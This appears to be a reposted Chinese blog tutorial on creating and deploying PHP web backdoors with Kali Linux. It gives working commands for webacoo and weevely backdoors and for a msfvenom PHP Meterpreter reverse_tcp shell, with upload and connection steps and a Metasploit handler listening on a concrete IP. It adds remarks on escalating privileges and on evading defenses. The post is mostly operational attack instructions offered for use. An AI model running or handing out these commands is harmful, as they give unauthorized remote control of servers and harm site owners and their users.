kali下生成web端后门
? 很多時候在***測試時選擇web***害怕用的別人的馬帶有后門,這樣自己的辛苦就要被別人不勞而獲,很多時候我們都想擁有自己的馬,那么這個時候你就應該使用kail來生成一個自己獨特密碼的web***了。
?Kali Linux自帶有好幾個web***生成工具,下面我們來簡單看幾個:
1.webacoo后門
webacoo ?-g -o test.php
-g 制作后門代碼
-o 輸出生成指定的后門程序文件名
把web后門上傳到目標服務器后
使用kali linux訪問如下
webacoo -t -u?http://www.xx.com/test.php
注意:上傳的路徑一定要正確
最后退出的時候使用exit退出
2.weevely
查看幫助信息
生成后門
下列命令可以生產混攪PHP backdoor , 密碼password 后門名字disaplay.php
weevely generate password disaplay.php
把后門文件上傳到服務器后,如下命令可以成功訪問
weevely?http://www.xxx.com/disaplay.php?password
通過help看到weevely有很多的module
.net.ifaces 查看服務器的端口信息
.net.scan 202.205.xx.xx 22 ? 對服務器某個端口掃描
3.PHP Meterpreter
metasploit有一個名為PHP Meterpreter的payload,可創建具有meterpreter功能的PHP webshell。
Metasploit的msfvenom工具可以制作PHP Meterpreter,命令如下:
msfvenom ?-p ?php/meterpreter/reverse_tcp LHOST=自己監聽的IP -f raw > php_meter.php
-p 設置payload
-f 設置輸出文件格式
但是使用前需要注意生成文件的第一行被注釋了,所以需要把注釋去掉才能使用
把webshell上傳到目標服務器,本地監聽打開如下:
啟動msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 202.205.7.162
然后我們就可以使用kali的metasploit功能對目標服務器進行一系列操作。
這種WEBSHELL 利用起來相當方便,輸入shell命令之后,就可以隨便提權什么的了.
1,國內的貌似沒有防護這塊的,國內大多只防護GET POST COOKIE這些數據.
2,缺點是如果服務器在DMZ,則失效.
3,more what .....?? 這種shell如果被利用多了,肯定會有硬件廠商去做防護的.
總結
以上是生活随笔為你收集整理的kali下生成web端后门的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: ECSHOP 大商创 对接易支付接口
- 下一篇: mysql-安装报错计算机中丢失MSVC